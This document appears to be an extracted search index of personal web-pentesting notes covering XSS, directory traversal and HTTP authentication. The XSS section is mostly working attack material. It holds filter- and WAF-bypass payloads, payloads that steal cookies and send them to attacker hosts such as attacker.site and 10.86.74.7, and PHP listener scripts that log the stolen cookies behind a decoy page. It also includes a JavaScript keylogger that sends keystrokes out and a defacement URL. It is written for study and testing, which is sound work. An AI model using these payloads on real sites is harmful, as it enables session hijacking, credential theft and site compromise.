                                        1. Reflected attacks: the malicious payload is carried inside the request that the victim's browser sends. You need to bypass any anti-XSS filters. When the victim clicks on the crafted link, their information is sent to the attacker (limited to JS events).

                                        Example:

                                        http://victim.site/seach.php?find=<payload>\n

                                        2. Persistent or stored XSS attacks: the payload is sent to the web server and then stored. The most common vector for these attacks are HTML forms that submit content to the web server and then display that content back to the users (comments, user profiles, forum posts…). Basically, if the payload is stored on the server, then every time someone accesses the affected page they will suffer the attack.

                                        3. DOM based XSS attacks: a tricky one. This time the JavaScript file comes from the server and, in that sense, is trusted. Nevertheless, the script modifies the web page's structure (the DOM). Quoting OWASP: \"DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an unexpected manner\".

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-reflected-cross-site-scripting","title":"1. Reflected Cross Site Scripting","text":"

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

                                        Reflected\u00a0Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

                                        XSS Filter Evasion Cheat Sheet

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes","title":"Causes","text":"

                                        This vulnerable PHP code in a welcome page may lead to an XSS attack:

                                        <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-persistent-or-stored-cross-site-scripting","title":"2. Persistent or stored Cross Site Scripting","text":"OWASP reference

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

                                        Stored cross-site scripting is a vulnerability where an attacker is able to inject Javascript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload in to a webpage on a website without proper sanitization, the XSS payload injected in to the webpage will be executed by the browser of anyone that visits that webpage.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_1","title":"Causes","text":"

                                        This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

                                        <?php \n$name = @$_GET['name'];\n$file  = 'newcomers.log';\nif($name){\n    $current = file_get_contents($file);\n    $current .= $name.\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin, show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=$name?>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-dom-cross-site-scripting-type-0-or-local-xss","title":"3. DOM Cross Site Scripting (Type-0 or Local XSS)","text":"OWASP reference

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

                                        The key in exploiting this XSS flaw is that the client-side script code can access the browser's DOM, thus all the information available in it. Examples of this information are the URL, history, cookies, local storage,... Technically there are two keywords: sources and sinks. Let's use the following vulnerable code:

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_2","title":"Causes","text":"

                                        This vulnerable code in a welcome page may lead to a DOM XSS attack: http://example.com/#w!Giuseppe

                                        <h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome \";\n    // Take everything after the \"#w!\" marker in the URL fragment\n    var name = document.location.hash.substring(\n                document.location.hash.search(/#w!/i) + 3,\n                document.location.hash.length\n                );\n    document.getElementById('welcome').innerHTML = w + name;\n</script>\n

                                        location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

                                        To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.

                                        What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

                                        Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.
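
                                        A minimal illustration of the source-to-sink flow (hypothetical page with a 'welcome' element): the same untrusted value is dangerous in an HTML sink but harmless in a text sink:

                                        var name = decodeURIComponent(location.hash.slice(1)); // source: attacker-controlled\ndocument.getElementById('welcome').innerHTML = 'Welcome ' + name; // sink: DOM XSS\ndocument.getElementById('welcome').textContent = 'Welcome ' + name; // safe: no HTML parsing\n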

                                        Which sinks can lead to DOM-XSS vulnerabilities:

                                        • document.write()
                                        • document.writeln()
                                        • document.replace()
                                        • document.domain
                                        • element.innerHTML
                                        • element.outerHTML
                                        • element.insertAdjacentHTML
                                        • element.onevent

                                        This project, DOMXSS wiki aims to identify sources and sinks methods exposed by public, widely used javascript frameworks.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-universal-xss-uxss","title":"4. Universal XSS (UXSS)","text":"

                                        Universal XSS is a particular type of Cross Site Scripting that does not leverage flaws in the web application, but in the browser, its extensions or its plugins. A typical example could be found within the Google Chrome WordReference Extension, which did not properly sanitize the input of the search.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#attack-techniques","title":"Attack techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#quick-steps-to-test-xss","title":"Quick steps to test XSS","text":"

                                        1. Detect input vectors. Find a reflection point for a given input entry. This is tricky, since sometimes the entered value is reflected on a different part of the application.

                                        2. Check impact. Once the reflection point is identified, inspect the source code and recursively expand all tags to make sure that it's really a reflection point and that your input is not being parsed. This is also tricky, but there are techniques such as encoding and double encoding that will allow us to bypass some XSS filters.

                                        3. Classify your injection point correctly. Are you injecting directly into raw HTML or into an HTML tag? Are you injecting a tag attribute value? Are you injecting into the JavaScript code? Where in the DOM are you operating? Is there a WAF tampering with your input? Answering these questions amounts to knowing which characters you need to escape.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-bypassing-xss-filters","title":"1. Bypassing XSS filters","text":"

                                        Reflected cross-site scripting attacks are prevented when the web application sanitizes input, when a web application firewall blocks malicious input, or by mechanisms embedded in modern web browsers.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#11-injecting-inside-raw-html","title":"1.1. Injecting inside raw HTML","text":"
                                        <script>alert(1)</script>\n<img src=x onerror=alert(1) />\n<svg onload=alert('XSS')>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#12-injecting-into-html-tags","title":"1.2. Injecting into HTML tags","text":"

                                        Firstly, some common escaping characters that may be parsed (and you need to further investigate to see how the application is treating them) are:

                                        • >\u00a0(greater than)
                                        • <\u00a0(less than)
                                        • &\u00a0(ampersand)
                                        • '\u00a0(apostrophe or single quote)
                                        • \"\u00a0(double quote)

                                        Additionally, there might exist a filter for the characters script. Being that the case:

                                        1. Insert unexpected variations in the syntax such as random capitalization, blank spaces, new lines...:

                                        \"><script >alert(document.cookie)</script >\n\"><ScRiPt>alert(document.cookie)</ScRiPt>\n

                                        2. Bypass non-recursive filtering:

                                        <scr<script>ipt>alert(document.cookie)</script>\n

                                        3. Bypass encoding.

                                        # Simple encoding\n\"%3cscript%3ealert(document.cookie)%3c/script%3e\n\n# More encoding techniques: \n# 1. We look for a charcode calculator and enter our payload, for instance \"lala\" would be: 34, 108, 97, 108, 97, 34\n# 2. Then we put those numbers in our payload\n<script>alert(String.fromCharCode(34, 108, 97, 108, 97, 34))</script>\n

                                        Double encoding is very effective. I've run into cases in the wild.
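
                                        Double encoding can be produced in one step from the browser console; the assumption is that a front-end filter decodes and checks the input once, while a later component decodes it a second time:

                                        encodeURIComponent(encodeURIComponent('<script>alert(1)</script>'));\n// -> %253Cscript%253Ealert(1)%253C%252Fscript%253E\n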

                                        4. Unexpected parent tags:

                                        <svg><x><script>alert('1'&#41</x>\n

                                        5. Unexpected weird attributes, null bytes:

                                        <script x>\n<script a=\"1234\">\n<script ~~~>\n<script/random>alert(1)</script>\n<script ///Note the newline\n>alert(1)</script>\n<scr\\x00ipt>alert(1)</scr\\x00ipt>\n

                                        More: if the script tag is blacklisted in all its forms, use other tags:

                                        <img> ... <IMG>\n<iframe>\n<input>\n

                                        Or even make up your own:

                                        <lalala> \n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#13-injecting-into-html-attributes","title":"1.3. Injecting into HTML attributes","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#a-id","title":"a) id","text":"

                                        For instance, this injection endpoint (INJ):

                                        <div id=\"INJ\">\n

                                        A payload for grabbing the cookies and have them sent to our attacker server would be:

                                        x\" onmouseover=\"new Image().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#b-href","title":"b) href","text":"

                                        For instance, this injection endpoint (INJ):

                                        <a href=\"victim.site/#INJ\">\n

                                        A payload for grabbing the cookies and have them sent to our attacker server would be:

                                        x\" onmouseover=\"new Image().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#c-height","title":"c) height","text":"

                                        For instance, this injection endpoint (INJ):

                                        <video  width=\"320\" height=\"INJ\">\n

                                        A payload for grabbing the cookies and have them sent to our attacker server would be:

                                        240\" src=x onerror=\"new Audio().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n

                                        1. One nice technique is using uncommon JavaScript event handlers.

                                        # The usual payloads call these functions:\nalert()\nconfirm()\nprompt()\n\n# Try triggering them from less common event handlers:\nonload\nonerror\nonmouseover\n...\n

                                        See complete reference at: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

                                        2. Sometimes the events are filtered. This is a very common regex for filtering:

                                        (on\\w+\\s*=)\n

                                        Bypassing it:

                                        <svg/onload=alert(1)>\n<svg//////onload=alert(1)>\n<svg id=x;onload=alert(1)>\n<svg id='x'onload=alert(1)>\n

                                        3. Improving the filter:

                                        (?i)([\\s\\\"'`;\\/0-9\\=]+on\\w+\\s*=)\n

                                        Bypassing it:

                                        <svg onload%09=alert(1)>\n<svg %09onload=alert(1)>\n<svg %09onload%09=alert(1)>\n<svg onload%09%20%28%2c%3B=alert(1)>\n<svg onload%0B=alert(1)>\n

                                        https://shazzer.co.uk/vectors is a great resource to see potential attack vectors.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#14-going-beyond-the-scripttag","title":"1.4. Going beyond the <script>tag","text":"
                                        <a href=\"javascript:alert(1)\">click</a>\n<a href=\"data:text/html;base64,amF2YXNjcmlwdDphbGVyKDEp\">click</a>\n<form action=\"javascript:alert(1)\"><button>send</button></form>\n\n<form id=x></form><button form=\"x\" formaction=\"javascript:alert(1)\">send</button>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-bypassing-the-httponly-flag","title":"2. Bypassing the HTTPOnly flag","text":"

                                        The HTTPOnly flag can be enabled with the response header Set-Cookie:

                                        Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

                                        HTTPOnly forbids JavaScript from accessing the cookies, for example, through the Document.cookie property.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#21-cross-site-tracing","title":"2.1. Cross Site Tracing","text":"

                                        OWASP Cross Site Tracing reference

                                        A technique for bypassing the HTTPOnly flag. Since script access to cookies is blocked by HTTPOnly, this technique proposes using the HTTP TRACE method.

                                        The HTTP TRACE method is used for debugging: it echoes the received request back to the client. So, if we send HTTP headers normally inaccessible to JavaScript, we will be able to read them in the response.

                                        We will take advantage of the JavaScript object XMLHttpRequest, which provides a way to retrieve data from a URL without having to do a full page refresh:

                                        <script> // TRACE Request\n    var xmlhttp = new XMLHttpRequest();\n    var url = 'http://victim.site/';\n    xmlhttp.withCredentials = true; // Send cookie header\n    xmlhttp.open('TRACE', url);\n\n    // Callback to log all response headers\n    function hand() { console.log(this.getAllResponseHeaders()); }\n    xmlhttp.onreadystatechange = hand;\n\n    xmlhttp.send(); // Send the request\n\n</script>\n

                                        Modern browsers block the HTTP TRACE method in XMLHttpRequest and other scripting languages and libraries such as JQuery, Silverlight... But if the attacker finds another way of doing HTTP TRACE requests, then they can bypass the HTTPOnly flag.

                                        For instance, Amit Klein found a simple trick for IE 6.0 SP2. Instead of using TRACE for the method, he used \r\nTRACE and the payload worked under certain circumstances.

                                        CVE-2012-0053: Apache HTTPOnly cookie disclosure, affecting Apache HTTP Server 2.2.x through 2.2.21. For an HTTP header value exceeding the server limits, the server responded with an HTTP 400 Bad Request that included the complete headers, HTTPOnly cookies among them. (https://gist.github.com/pilate/1955a1c28324d4724b7b). BeEF has a module named Apache Cookie Disclosure, available under the Exploits section.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#22-beef-tunneling-proxy","title":"2.2. BeEF Tunneling Proxy","text":"

                                        An alternative to stealing protected cookies is to use the victim's browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim's browser to perform requests to the web application as the victim user. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from a legitimate user and requests forged by an attacker. BeEF allows you to bypass other web developer protection techniques such as using multiple validations (User-Agent, custom headers,...)

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#bypassing-wafs","title":"Bypassing WAFs","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#modsecurity","title":"ModSecurity","text":"
                                        <svg onload='new Function`[\"_Y000!_\"].find(al\u0065rt)`'>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#examples-of-typical-attacks","title":"Examples of typical attacks","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-cookie-stealing-examples-and-techniques","title":"1. Cookie stealing: examples and techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-1","title":"Example 1","text":"

                                        Identify an injection endpoint and test that the app is vulnerable to a basic xss payload such as:

                                        <script>alert('lala')</script>\n

                                        Once you know is vulnerable, prepare a malicious javascript code for stealing the cookies:

                                        <script>\nvar i = new Image();\ni.src = \"http://attacker.site/log.php?q=\"+document.cookie;\n</script>\n

                                        Add that code to the injection endpoint that you detected in step 1. That code will save the cookie in a text file on the attacker site.

                                        Create a PHP file (log.php) on the attacker site for capturing the sent cookie:

                                        <?php\n    $filename = \"/tmp/log.txt\";\n    $fp = fopen($filename, 'a');\n    $cookie = $_GET['q'];\n    fwrite($fp, $cookie);\n    fclose($fp);\n?>\n

                                        Open the listener on the attacker site and send the crafted URL with the payload included. Once someone opens it, they will be sending their cookie jar to the attacker.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-2","title":"Example 2","text":"
                                        1. The attacker creates a get.php file and saves it into its server.

                                        2. This php file will store the data that the attacker server receives into a file.

                                        3. This could be the content of the get.php file:

                                        <?php\n    $ip = $_SERVER['REMOTE_ADDR'];\n    $browser = $_SERVER['HTTP_USER_AGENT'];\n\n    $fp = fopen('jar.txt', 'a');\n\n    fwrite($fp, $ip . ' ' . $browser . \"\\n\");\n    fwrite($fp, urldecode($_SERVER['QUERY_STRING']) . \"\\n\\n\");\n    fclose($fp);\n?>\n
                                        4. Now, on the web server, the attacker manages to store this payload:
                                        <script>\nvar i = new Image();\ni.src = \"http://attacker.site/get.php?cookie=\"+escape(document.cookie);\n</script>\n\n# Or in one line:\n<script>var i = new Image(); i.src = \"http://10.86.74.7/moville.php?cookie=\"+escape(document.cookie); </script>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#techniques-for-cookie-stealing","title":"Techniques for cookie stealing","text":"

                                        Let's suppose we have our PHP script C.php listening on our hacker.site domain.

                                        Example of a C.php simple listener:

                                        # Instruct the script to simply store the GET['cc'] content in a file\n<?php\nerror_reporting(0); # Turn off all error reporting\n$cookie= $_GET['cc']; # Request to log\n$file= '_cc_.txt'; # The log file\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$cookie.\"\\n\"); # Append the cookie\nfclose($handle); # Close the log file\n\necho '<h1>Page under construction</h1>'; # Trying to avoid suspicion.\n

                                        Example of a C.php listener recording hosts, time of logging and IP addresses:

                                        # Instruct the script to store the QUERY_STRING content in a file, together with the date and the victim IP\n<?php\nerror_reporting(0); # Turn off all error reporting\n\nfunction getVictimIP() { ... } # Function that returns the victim IP\nfunction collect() {\n$file= '_cc_.txt'; # The log file\n$date=date(\"l dS of F Y h:i:s A\");\n$IP=getVictimIP();\n$cookie= $_SERVER['QUERY_STRING'];\n$info=''; # Placeholder for any extra info to log\n\n$log=\"[$date]\\n\\t> VictimIP: $IP\\n\\t> Cookies: $cookie\\n\\t> Extra info: $info\\n\";\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$log.\"\\n\\b\"); # Append the log entry\nfclose($handle); # Close the log file\n}\ncollect();\necho '<h1>Page under construction</h1>'; # Trying to avoid suspicion.\n

                                        Additionally we can use: netcat, Beef,...

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-dom-based-attack-incorrect-use-of-eval","title":"2. DOM based attack: incorrect use of eval()","text":"

                                        In the following website we can see the code below:

                                        And in the source code we can pinpoint this script:

                                        <script>\n    var statement = document.URL.split(\"statement=\")[1];\n    document.getElementById(\"result\").innerHTML = eval(statement);\n</script>\n

                                        This JavaScript code is responsible for calculating and dynamically displaying the result of the arithmetic operation via the DOM. It splits the URL and passes the value of the statement parameter to the JavaScript eval() function for evaluation/calculation.

                                        The JavaScript\u00a0eval()\u00a0function is typically used by developers to evaluate JavaScript code, however, in this case, it has been improperly implemented to evaluate/perform the arithmetic operation specified by the user.

                                        NOTE: The eval()\u00a0function should never be used to execute JavaScript code in the form of a string as it can be leveraged by attackers to perform arbitrary code execution.

                                        Given the improper implementation of the eval() function, we can inject our XSS payload as the value of the statement parameter and force the eval() function to execute the JavaScript payload.
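
                                        For instance, with the vulnerable script above and a hypothetical page name, a URL such as the following makes eval() run the injected code:

                                        // http://victim.example/calc.html?statement=alert(document.cookie)\n// The sink then effectively executes:\neval('alert(document.cookie)');\n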

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-defacements","title":"3. Defacements","text":"

                                        We may categorize defacements into two types: Non-persistent (Virtuals) and Persistent.

                                        • Non-persistent defacements don't modify the content hosted on the target web application. They are basically abusing Reflected XSS.
                                        # Code\n<?php $name = @$_GET['name']; ?>\nWelcome <?=$name?>\n\n# URL\nhttps://victim.site/XSS/reflected.php?name=%3Cscript%3Edocument.body.innerHTML=%22%3Cimg%20src=%27http://hackersite/pwned.png%27%3E%22%3C/script%3E\n
                                        • Persistent defacements modify permanently the content hosted on the target web application. They are basically abusing Stored XSS.

                                        Tools for cloning a website

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-keyloggers","title":"4. Keyloggers","text":"

                                        A tool: http_javascript_keylogger. See also my notes on that metasploit module.

                                        Event logger from BeEF.

                                        The following code:

                                        var keys = \"\"; // WHERE > buffer that stores the key strokes\ndocument.onkeypress = function(e) {\n    var get = window.event ? window.event : e;\n    var key = get.keyCode ? get.keyCode : get.charCode;\n    key = String.fromCharCode(key);\n    keys += key;\n}\n\nwindow.setInterval(function() {\n    if (keys != \"\") {\n        // HOW > sends the key strokes via GET using an Image element to the listening hacker.site server\n        var path = encodeURI(\"http://hacker.site/keylogger?k=\" + keys);\n        new Image().src = path;\n        keys = \"\";\n    }\n}, 1000); // WHEN > sends the key strokes every second\n

                                        Additionally, we have the metasploit module auxiliary(http_javascript_keylogger), an advanced version of the previous JavaScript code. It creates the JavaScript payload with a keylogger, which could be injected within the vulnerable web page, and automatically starts the listening server. To see how it works, set the DEMO option to true.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#5-network-attacks","title":"5. Network attacks","text":"

                                        A way into intranet networks is through HTTP traffic which, unlike other protocols, is usually allowed through firewalls.

                                        1. IP detection

                                        The first step before setting foot in a network is to retrieve as much network information as possible about the hooked browser, for instance by revealing its internal IP address and subnet.

                                        Traditionally, this required the use of external browser plugins such as the Java JRE and some interaction from the victim: installing the My Address Java applet (an unsigned Java applet that retrieves the IP) and changing the Java security settings (enabling or reducing the security level).

                                        A modern alternative is https://net.ipcalf.com/, which abuses the WebRTC HTML5 feature.
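
                                        A minimal sketch of that WebRTC trick (note that modern browsers may mask local addresses with mDNS .local candidates):

                                        var pc = new RTCPeerConnection({ iceServers: [] });\npc.createDataChannel('');\npc.onicecandidate = function(e) {\n    if (e.candidate) console.log(e.candidate.candidate); // ICE candidates can leak local IPs\n};\npc.createOffer().then(function(o) { pc.setLocalDescription(o); });\n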

                                        2. Subnet detection

                                        3. Ping Sweeping

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#6-bypassing-restrictions-in-frameset-tag","title":"6. Bypassing restrictions in frameset tag","text":"

                                        See https://www.doyler.net/security-not-included/frameset-xss.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#mitigations-for-cookie-stealing","title":"Mitigations for cookie stealing","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#httponly","title":"HTTPOnly","text":"

                                        The HTTPOnly flag can be enabled with the response header Set-Cookie:

                                        Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

                                        HTTPOnly forbids JavaScript from accessing the cookies, for example, through the Document.cookie property. Note that a cookie created with the HttpOnly directive will still be sent with JavaScript-initiated requests, for example, when calling XMLHttpRequest.send() or fetch(). This mitigates cookie-theft attacks based on cross-site scripting (XSS).
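
                                        A small demo of both behaviours, assuming the server previously answered with a Set-Cookie: session=...; HttpOnly header:

                                        console.log(document.cookie); // HttpOnly cookies are not listed here\nfetch('/profile', { credentials: 'include' }); // ...but the browser still attaches them to this request\n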

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • XSSER: An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                                        • Vectors (payload) regularly updated: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet.
                                        • Evasion Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html.
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/directory-traversal/","title":"Directory Traversal attack","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                                        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) Resources
                                        • PayloadsAllTheThings

                                        Directory traversal vulnerabilities, also known as path traversal or directory climbing vulnerabilities, are a type of security vulnerability that occurs when a web application allows unauthorized access to files and directories outside the intended or authorized directory structure. Directory traversal vulnerabilities can lead to serious data breaches and system compromises if not addressed/mitigated.

                                        Directory traversal vulnerabilities typically arise from improper handling of user input, especially when dealing with file or directory paths. This input could be obtained from URL parameters, user-generated content, or other sources. An attacker takes advantage of lax input validation or insufficient sanitization of user inputs. They manipulate the input by adding special characters or sequences that trick the application into navigating to directories it shouldn't have access to.

                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#before-testing","title":"Before testing","text":"

                                        Each operating system uses different characters as path separator:

                                        Unix-like OS:

                                        root directory: \"/\"\ndirectory separator: \"/\"\n

Windows OS shell:

                                        root directory: \"<drive letter>:\\\"\ndirectory separator: \"\\\" or \"/\"\n

                                        Classic Mac OS:

                                        root directory: \"<drive letter>:\"\ndirectory separator: \":\"\n
                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#basic-exploitation","title":"Basic exploitation","text":"

We can use the .. characters to access the parent directory; the following strings are several encodings that can help you bypass a poorly implemented filter.

../\n..\\\n..\\/\n\n\n#####\n# - URL encoding and double URL encoding\n#####\n\n# ../\n%2e%2e%2f\n%2e%2e/\n..%2f\n\n# ..\\\n%2e%2e%5c\n%2e%2e\\\n..%5c\n%252e%252e%255c\n\n# ../ (double URL encoding, overlong UTF-8 and Unicode variants)\n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n
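A minimal probe loop, assuming a hypothetical ?page= inclusion parameter; each payload is repeated enough times to climb out of the web root:

```bash
# Try a few of the encodings above against a hypothetical vulnerable parameter
for p in '../' '..%2f' '%2e%2e%2f' '%252e%252e%252f'; do
  if curl -s "http://$ip/index.php?page=${p}${p}${p}etc/passwd" | grep -q 'root:'; then
    echo "Filter bypassed with: $p"
  fi
done
```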
                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#interesting-files","title":"Interesting files","text":"

• Interesting Windows files
• Interesting Linux files

                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        • DotDotPwn - The Directory Traversal Fuzzer -\u00a0http://dotdotpwn.sectester.net
                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/http-authentication-schemes/","title":"HTTP Authentication Schemes","text":"

                                        This resource is pretty awesome: https://learn.microsoft.com/en-us/dotnet/framework/wcf/feature-details/understanding-http-authentication.

I'll be (CTRL-c-CTRL-v)ing what I think is important.

                                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#understanding-http-authentication","title":"Understanding HTTP Authentication","text":"

                                        Authentication is the process of identifying whether a client is eligible to access a resource. The HTTP protocol supports authentication as a means of negotiating access to a secure resource.

The initial request from a client is typically an anonymous request, not containing any authentication information. HTTP server applications can deny the anonymous request while indicating that authentication is required. The server application sends WWW-Authenticate headers to indicate the supported authentication schemes.

                                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#http-authentication-schemes_1","title":"HTTP Authentication Schemes","text":"Authentication Scheme Description Anonymous An anonymous request does not contain any authentication information. This is equivalent to granting everyone access to the resource. Basic Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication. Digest Digest authentication is a challenge-response scheme that is intended to replace Basic authentication. The server sends a string of random data called a nonce to the client as a challenge. The client responds with a hash that includes the user name, password, and nonce, among additional information. The complexity this exchange introduces and the data hashing make it more difficult to steal and reuse the user's credentials with this authentication scheme. Digest authentication requires the use of Windows domain accounts. The digest realm is the Windows domain name. Therefore, you cannot use a server running on an operating system that does not support Windows domains, such as Windows XP Home Edition, with Digest authentication. Conversely, when the client runs on an operating system that does not support Windows domains, a domain account must be explicitly specified during the authentication. NTLM NT LAN Manager (NTLM) authentication is a challenge-response scheme that is a securer variation of Digest authentication. NTLM uses Windows credentials to transform the challenge data instead of the unencoded user name and password. NTLM authentication requires multiple exchanges between the client and server. The server and any intervening proxies must support persistent connections to successfully complete the authentication. Negotiate Negotiate authentication automatically selects between the Kerberos protocol and NTLM authentication, depending on availability. The Kerberos protocol is used if it is available; otherwise, NTLM is tried. Kerberos authentication significantly improves upon NTLM. Kerberos authentication is both faster than NTLM and allows the use of mutual authentication and delegation of credentials to remote machines. Windows Live ID The underlying Windows HTTP service includes authentication using federated protocols. However, the standard HTTP transports in WCF do not support the use of federated authentication schemes, such as Microsoft Windows Live ID. Support for this feature is currently available through the use of message security.","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#basic-http-authentication","title":"Basic HTTP Authentication","text":"

                                        Basic HTTP authentication is a simple authentication mechanism used in web applications and services to restrict access to certain resources or functionalities. Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication.

                                        • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if the resource requires authentication.
